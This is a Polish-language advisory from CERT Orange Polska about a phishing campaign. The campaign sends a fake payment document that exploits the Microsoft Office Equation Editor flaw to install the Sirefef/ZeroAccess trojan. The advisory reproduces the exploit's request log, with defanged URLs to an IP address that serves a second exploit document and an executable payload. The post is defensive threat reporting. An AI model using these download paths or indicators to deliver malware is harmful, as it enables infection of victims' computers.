hamburger

(jeśli zgłaszasz przypadek phishingu, zapisz mail (przesuń go z programu pocztowego na pulpit komputera lub wybierz opcję plik/zapisz jako), a następnie załącz)

Podejrzany SMS prześlij na nr 508 700 900

Jeśli zgłoszenie dotyczy bezpieczeństwa dzieci, zgłoś je również pod http://www.dyzurnet.pl
@CERT_OPL

Kampania malware na exploit w MS Office

Przeszło pół roku temu informowaliśmy o podatności w Edytorze Równań Microsoft Office, pozwalającej na wykonanie zaszytego w dokumencie złośliwego kodu bez interakcji z użytkownikiem i bez jego wiedzy. Dziś trafił do CERT Orange Polska trafił wykorzystujący ją mail phishingowy.

Opisywana kampania wykorzystuje znany – i wydawałoby się zgrany – motyw na „panie, skąd ta płatność?!”.

Jeśli damy się złapać i odruchowo otworzymy załączony plik payment SLIP.docx, sam dokument okaże się pusty, a exploit wywoła następujące akcje:

request               OPTIONS hxxp://31.220.40.22/~bvcgroup/
request               HEAD hxxp://31.220.40.22/~bvcgroup/Drawing.doc
request               OPTIONS hxxp://31.220.40.22/~bvcgroup
request               GET hxxp://31.220.40.22/~bvcgroup/Drawing.doc
request               GET hxxp://31.220.40.22/~bvcgroup/00011111.exe

Plik exe to – jak można się spodziewać – malware, zaś plik doc, który po otwarciu wygląda tak:

zawiera kolejnego exploita. Analizy wykazują, że złośliwy kod serwowany w tej kampanii to Trojan Sirefef, znany także jako ZeroAccess. Jego najbardziej znane aktywności to zmienianie wyników wyszukiwania, podmienianie reklam na przynoszące zysk przestępcom, a także używanie komputera ofiary do kopania kryptowaluty. Przestrzegamy jednak przed jego niedocenianiem – jeśli nasz komputer zostanie przejęty, tylko od przestępcy zależy, co w kolejnym kroku na nim zainstaluje.

Adresy powiązane z opisywaną kampanią są zablokowane przez CyberTarczę, więc jeśli korzystasz z sieci Orange Polska, malware nie będzie w stanie pobrać kolejnych komponentów. Jeśli nie masz pewności, czy nie jesteś ofiarą ataku – zajrzyj na https://cert.orange.pl/cybertarcza i sprawdź.

Przestępcom dziękujemy za wysyłanie phishingów na Abuse’a i prosimy o kolejne.

Komunikat dotyczący plików cookies

Ta witryna używa plików cookies (małych plików tekstowych, przechowywanych na Twoim urządzeniu). Są one stosowane dla zapewnienia prawidłowego działania strony oraz do zbierania informacji o Twoich preferencjach i nawykach użytkowania witryny.

Pliki cookies niezbędne do działania strony używamy do zapewnienia podstawowych funkcji, takich jak logowanie oraz zapewnienie bezpieczeństwa witrynie. Ich wykorzystanie nie wymaga Twojej zgody.

Pliki cookies funkcyjne. Pozwalają nam zbierać informacje na temat zalogowanych sesji oraz przechowywać dane wpisane przez Ciebie w formularzach znajdujących się na stronie takich jak: czas trwania zalogowanej sesji , nazwę użytkownika.

Pozostałe kategorie wykorzystywania plików cookies, które wymagają Twojej zgody na używanie

Pliki cookies statystyczne/analityczne. Pozwalają nam zbierać anonimowe informacje o ruchu na stronie (liczba odwiedzin, źródło ruchu i czas spędzony na witrynie). Te dane pomagają nam zrozumieć, jak nasi użytkownicy korzystają z witryny i poprawiają jej działanie.

Możesz zmienić swoje preferencje dotyczące plików cookies w każdej chwili. W celu zarządzania plikami cookies lub wycofania zgody na ich używanie, prosimy skorzystać z ustawień przeglądarki internetowej.